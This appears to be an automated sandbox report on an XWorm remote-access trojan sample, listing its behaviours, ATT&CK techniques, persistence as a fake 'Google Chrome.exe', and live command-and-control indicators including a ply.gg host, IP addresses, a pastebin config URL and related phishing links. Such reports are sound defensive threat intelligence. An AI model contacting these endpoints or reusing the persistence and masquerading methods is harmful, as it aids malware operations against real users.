            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exe; Queries volume information: C:\Users\user\AppData\Local\Google Chrome.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exe; Queries volume information: C:\Users\user\AppData\Local\Google Chrome.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exe; Queries volume information: C:\Users\user\AppData\Local\Google Chrome.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Google Chrome.exe; Queries volume information: C:\Users\user\AppData\Local\Google Chrome.exe VolumeInformation
            Source: C:\Users\user\Desktop\ra66DSpa.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: ra66DSpa.exe, 00000000.00000002.3383710805.000000001BAD4000.00000004.00000020.00020000.00000000.sdmp, ra66DSpa.exe, 00000000.00000002.3347083879.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, ra66DSpa.exe, 00000000.00000002.3347083879.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\ra66DSpa.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\ra66DSpa.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\ra66DSpa.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            Source: Yara match; File source: ra66DSpa.exe, type: SAMPLE
            Source: Yara match; File source: 0.0.ra66DSpa.exe.6b0000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: ra66DSpa.exe PID: 4540, type: MEMORYSTR
            Source: Yara match; File source: C:\Users\user\AppData\Local\Google Chrome.exe, type: DROPPED

            Remote Access Functionality

            Source: Yara match; File source: ra66DSpa.exe, type: SAMPLE
            Source: Yara match; File source: 0.0.ra66DSpa.exe.6b0000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000000.00000000.2096216513.00000000006B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: ra66DSpa.exe PID: 4540, type: MEMORYSTR
            Source: Yara match; File source: C:\Users\user\AppData\Local\Google Chrome.exe, type: DROPPED
            MITRE ATT&CK Matrix (the number shown beside a technique in the report's matrix is kept in parentheses; techniques without a number are unflagged matrix cells)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
            Execution: Windows Management Instrumentation (11); Scheduled Task/Job (1); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
            Persistence: Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Privilege Escalation: Process Injection (11); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
            Defense Evasion: Masquerading (1); Disable or Modify Tools (11); Virtualization/Sandbox Evasion (131); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (2); DLL Side-Loading (1)
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
            Discovery: Security Software Discovery (221); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (13); Remote System Discovery; System Owner/User Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
            Collection: Archive Collected Data (11); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
            Command and Control: Web Service (1); Encrypted Channel (11); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Commonly Used Port; Application Layer Protocol
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1525343, Sample: ra66DSpa.exe, Start date: 04/10/2024, Architecture: WINDOWS, Score: 100
Start -> DNS/IP: pastebin.com; stay-brook.gl.at.ply.gg
Start -> signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
Start -> processes started: ra66DSpa.exe; Google Chrome.exe; Google Chrome.exe; 2 other processes
pastebin.com -> signature: Connects to a pastebin service (likely for C&C)
ra66DSpa.exe -> DNS/IP: stay-brook.gl.at.ply.gg (147.185.221.21, ports 42956, 53844, 53845, SALSGIVERUS, United States); pastebin.com (104.20.4.235, ports 443, 53843, CLOUDFLARENETUS, United States)
ra66DSpa.exe -> dropped file: C:\Users\user\AppData\...\Google Chrome.exe (PE32)
ra66DSpa.exe -> signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Protects its processes via BreakOnTermination flag; Bypasses PowerShell execution policy; 2 other signatures
ra66DSpa.exe -> processes started: powershell.exe; powershell.exe; powershell.exe; 2 other processes
powershell.exe -> signature: Loading BitLocker PowerShell Module
powershell.exe (each of the three instances) -> process started: conhost.exe
2 other processes -> processes started: conhost.exe; conhost.exe

Source | Detection | Scanner | Label
ra66DSpa.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
ra66DSpa.exe | 100% | Avira | TR/Spy.Gen
ra66DSpa.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Google Chrome.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Google Chrome.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Google Chrome.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
stay-brook.gl.at.ply.gg | 147.185.221.21 | true | true | | unknown
pastebin.com | 104.20.4.235 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://pastebin.com/raw/hhG5zGXd | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2179803004.000001749006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2267967383.000001B4EAE3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2400405761.00000241A8A4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2165359449.0000017480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DAFF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.0000024198C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2165359449.0000017480228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DAFF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.0000024198C09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2179803004.000001749006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2267967383.000001B4EAE3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2400405761.00000241A8A4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.co | powershell.exe, 00000005.00000002.2283007874.000001B4F371A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.mic | powershell.exe, 00000002.00000002.2190715701.00000174FCA7E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2622503730.000002904287E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 0000000A.00000002.2589055972.000002903A1EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micft.cMicRosof | powershell.exe, 00000002.00000002.2190715701.00000174FCA7E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2622503730.000002904287E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2165359449.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DADD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.00000241989E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A181000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ra66DSpa.exe, 00000000.00000002.3351496448.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2165359449.0000017480001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2215761829.000001B4DADD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2318510390.00000241989E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2457489535.000002902A181000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://pastebin.com | ra66DSpa.exe, 00000000.00000002.3351496448.00000000029D1000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000A.00000002.2457489535.000002902A3A8000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.20.4.235 | pastebin.com | United States | 13335 | CLOUDFLARENETUS | true
147.185.221.21 | stay-brook.gl.at.ply.gg | United States | 12087 | SALSGIVERUS | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1525343
                              Start date and time:2024-10-04 01:46:05 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 44s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:ra66DSpa.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@20/20@2/2
                              EGA Information:
                              • Successful, ratio: 11.1%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 97
                              • Number of non-executed functions: 7
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target Google Chrome.exe, PID 1456 because it is empty
                              • Execution Graph export aborted for target Google Chrome.exe, PID 1756 because it is empty
                              • Execution Graph export aborted for target Google Chrome.exe, PID 1816 because it is empty
                              • Execution Graph export aborted for target Google Chrome.exe, PID 6992 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 1948 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 2308 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 3520 because it is empty
                              • Execution Graph export aborted for target powershell.exe, PID 6284 because it is empty
• Not all processes were analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • VT rate limit hit for: ra66DSpa.exe
Time | Type | Description
01:47:50 | Task Scheduler | Run new task: Google Chrome path: C:\Users\user\AppData\Local\Google Chrome.exe
01:47:53 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Google Chrome C:\Users\user\AppData\Local\Google Chrome.exe
01:48:01 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Google Chrome C:\Users\user\AppData\Local\Google Chrome.exe
19:46:58 | API Interceptor | 49x Sleep call for process: powershell.exe modified
19:47:51 | API Interceptor | 249419x Sleep call for process: ra66DSpa.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.20.4.235 | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | sostener.vbs | malicious | XWorm | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | envifa.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Invoice Payment N8977823.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Pending_Invoice_Bank_Details_XLSX.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Pending_Invoice_Bank_Details_kofce_.JS.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
104.20.4.235 | Update on Payment.js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
147.185.221.21 | Q5N7WOpk8J.bat | malicious | Unknown |
147.185.221.21 | NzEsfIiAc0.exe | malicious | XWorm |
147.185.221.21 | Y666Gn09a1.exe | malicious | XWorm |
147.185.221.21 | Uhj9qfwbYG.exe | malicious | AsyncRAT, XWorm |
147.185.221.21 | WIN CHANGER 2.3.exe | malicious | XWorm |
147.185.221.21 | jj7svxNeaQ.exe | malicious | XWorm |
147.185.221.21 | PCCooker2.0_x64.exe | malicious | AsyncRAT, DCRat, GuLoader, Lokibot, Njrat, PureLog Stealer, SilverRat |
147.185.221.21 | JFhDGHXmW6.exe | malicious | Unknown |
147.185.221.21 | N7bEDDO8u6.exe | malicious | Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm |
147.185.221.21 | N7bEDDO8u6.exe | malicious | Blank Grabber, DCRat, Njrat, Umbral Stealer, XWorm |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
pastebin.com | tMREqVW0.exe | malicious | XWorm | 104.20.3.235
pastebin.com | wSVyC8FY.exe | malicious | XWorm | 172.67.19.24
pastebin.com | vb.vbs | malicious | AsyncRAT, PureLog Stealer | 104.20.3.235
pastebin.com | tYeFOUhVLd.exe | malicious | RedLine | 104.20.3.235
pastebin.com | SKMBT_77122012816310TD0128_17311_XLS.vbs | malicious | Remcos | 104.20.4.235
pastebin.com | sostener.vbs | malicious | Njrat | 104.20.4.235
pastebin.com | sostener.vbs | malicious | XWorm | 104.20.4.235
pastebin.com | 3.dll | malicious | Unknown | 104.20.3.235
pastebin.com | 6.dll | malicious | Unknown | 104.20.4.235
pastebin.com | 5.dll | malicious | Unknown | 104.20.3.235
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://link.edgepilot.com/s/527f3b22/IsEZW0vVpU28AdY1bja1GQ?u=https://securemail.wf.com/s/e?m=ABDLG7Db88ZOC03NJzhZQA0p%26c=ABCnBKdwqhBBe4jHrIQNGJMj | malicious | Unknown | 104.18.10.207
CLOUDFLARENETUS | file.exe | malicious | RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig | 104.26.3.46
CLOUDFLARENETUS | https://www.sexpartnercommunity.com/?e7ak3e0m=57296397&tba4bck7=eyJpdiI6Imp1cHMxdGJERWI4SjBwNVYvSWdWeHc9PSIsInZhbHVlIjoiSGhGdTY1TlFyN1JJQm03UEJhZGZxQjV2NncyZ0JWajdJZnRWaWNBZlM2dzVxV05KdGx3TXZaaURxZzgraDNUYURDK2EwcFUra28rNEE2YTdRYWRhdFdwQkxaL09xeDRCVUt0Rm1IT3cxa3hPd1huM3FkN3NzNS9BYjEwV2hOY3dzblZ6TW1TaUdDeXBOTG9zc2FtU0VZKzhNeVgzS1FkTnE3WnA5NUZqWXJTQkVaNlN1UmUrZFFTUlZzZ05pbVlnIiwibWFjIjoiOTFjZDc5Y2FhNTBkNGYyYWYzZDRiYzhlYjljMjZmYTE1MzBhNGI2MmQ0NTFhYmYyZmVjN2IwMGUyNmFlNjU3MCIsInRhZyI6IiJ9&spaRoute=/livecams/all&trk=toza80h | malicious | Unknown | 172.64.149.46
CLOUDFLARENETUS | file.exe | malicious | LummaC, Vidar | 172.67.214.93
CLOUDFLARENETUS | http://masdeliveryusa.com/ | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | Full-Setup.exe | malicious | LummaC | 172.67.214.93
CLOUDFLARENETUS | https://click.agilitypr.delivery/ls/click?upn=u001.eiLrPCkKKjApnPIr0I-2BsRfkpzjEGhTCoHqG09iolrdhlMYGCOo2Nd-2FxjkEBEx2ILarmVrzugxvL3mzK8oRbzmw-2Fc8MlnUZ-2Fr7oFdK8O5ZPNkRNGBT2B5w7-2BPGYsDVJaX7Ju4_CsMjdMvVCH8VnXX4Gfqu2d-2F8dUxANUAZ6i0guRxOZ16SBn-2BfWKPYCJ4k-2FRayz-2B7dgj-2Fry3pp6bh27tMOonGdCv5tjKX-2BF3xoFuSqeM2q0ggzsiKdwHoy3hTh08ynmZWbcBa2wQancmLCRha7gIvuGF-2BaYXuvGrIxnmpxoXmMm6ir51qvGKOvNKdK5IH4SYf35X5Wd-2Fs6YZWP8vKqWmGP1KToK5-2FGS-2BKn-2Bf84fcBuTdvvkjO8NEF5Bpt9hfpdVjRN-2FV0yMk97PXeyRMLgSEmwvvB4CTAjLo1gEwkG7vxhEAXXg1bNDHaxOZEzcIkoAbp8oMfK5YrMDngcc0JjC3pXeoycPv9IyLICjZ-2BgbU8HA-2BOjvDkAcylLxTWsU8lsqYTGnTfslidP4BMlB0nIxXCbcq4-2FLoVs6F-2Fhdrhdj9zy6VM-3D | malicious | HTMLPhisher | 104.16.117.116
CLOUDFLARENETUS | https://www.google.fr/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Flink.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS0z6wG-1zBDHwJKvW2cHgWJTMQtr_VqZTDREew7RsDJjLX3Nu-hOB30y_dTACc_DC20WhJeWfQI9ldVnZg5I3l2FTVB0RS05hmGx0cQsdDkHpPzJaYyjKcdoY7HYeMLqArftV0YSw5Wm9JJrOI2mXih3-C4cj98VpbIH9I96jbo0VVbIhhGr8mn95Nnhq8dJiEDFZ2amN-vFP0KvhVNzd6bzdT0TFK8bA49IWUCbU9MGpR1lTLTQ8wGn4FQOGHcxbAFQg5aCXIk9dUPzquvqJ8d/4a7/BVRt3igITgKfI8bq35Ml_w/h94/h001.jQSqGb0rCzLfgHVmmxaOCxarjpgyicdCc0Ov4XzL60w | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | https://account.attributes.best/communication.aspx?now=yikes.bikes@saic.com | malicious | Unknown | 104.21.70.28
CLOUDFLARENETUS | msvcp110.dll | malicious | LummaC | 172.67.214.93
SALSGIVERUS | tMREqVW0.exe | malicious | XWorm | 147.185.221.19
SALSGIVERUS | wSVyC8FY.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | eFvQTTtxej.exe | malicious | Njrat | 147.185.221.22
SALSGIVERUS | Q5N7WOpk8J.bat | malicious | Unknown | 147.185.221.21
SALSGIVERUS | SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | 3EtS1ncqvJ.exe | malicious | Njrat | 147.185.221.19
SALSGIVERUS | hfKx2T5IfT.exe | malicious | Njrat | 147.185.221.19
SALSGIVERUS | BANK PAYMENT COPY.doc | malicious | XWorm | 147.185.221.22
SALSGIVERUS | It8DXmSFEk.exe | malicious | Njrat | 147.185.221.19
SALSGIVERUS | 6Mt223MA25.exe | malicious | ArrowRAT | 147.185.221.18
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | https://www.sexpartnercommunity.com/?e7ak3e0m=57296397&tba4bck7=eyJpdiI6Imp1cHMxdGJERWI4SjBwNVYvSWdWeHc9PSIsInZhbHVlIjoiSGhGdTY1TlFyN1JJQm03UEJhZGZxQjV2NncyZ0JWajdJZnRWaWNBZlM2dzVxV05KdGx3TXZaaURxZzgraDNUYURDK2EwcFUra28rNEE2YTdRYWRhdFdwQkxaL09xeDRCVUt0Rm1IT3cxa3hPd1huM3FkN3NzNS9BYjEwV2hOY3dzblZ6TW1TaUdDeXBOTG9zc2FtU0VZKzhNeVgzS1FkTnE3WnA5NUZqWXJTQkVaNlN1UmUrZFFTUlZzZ05pbVlnIiwibWFjIjoiOTFjZDc5Y2FhNTBkNGYyYWYzZDRiYzhlYjljMjZmYTE1MzBhNGI2MmQ0NTFhYmYyZmVjN2IwMGUyNmFlNjU3MCIsInRhZyI6IiJ9&spaRoute=/livecams/all&trk=toza80h | malicious | Unknown | 104.20.4.235
3b5074b1b5d032e5620f69f9f700ff0e | http://masdeliveryusa.com/ | malicious | Unknown | 104.20.4.235
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Credential Flusher | 104.20.4.235
3b5074b1b5d032e5620f69f9f700ff0e | tMREqVW0.exe | malicious | XWorm | 104.20.4.235
3b5074b1b5d032e5620f69f9f700ff0e | https://wvr4dgzxxavl6jjpq7rl.igortsaplin.pro/WFzFCiNx | malicious | HTMLPhisher | 104.20.4.235
3b5074b1b5d032e5620f69f9f700ff0e | wSVyC8FY.exe | malicious | XWorm | 104.20.4.235
3b5074b1b5d032e5620f69f9f700ff0e | https://ahchoadeegu.homes?u=k8pp605&o=c9ewtnr&t=8845 | malicious | Unknown | 104.20.4.235
3b5074b1b5d032e5620f69f9f700ff0e | YxRMWWHAA2.exe | malicious | DCRat | 104.20.4.235
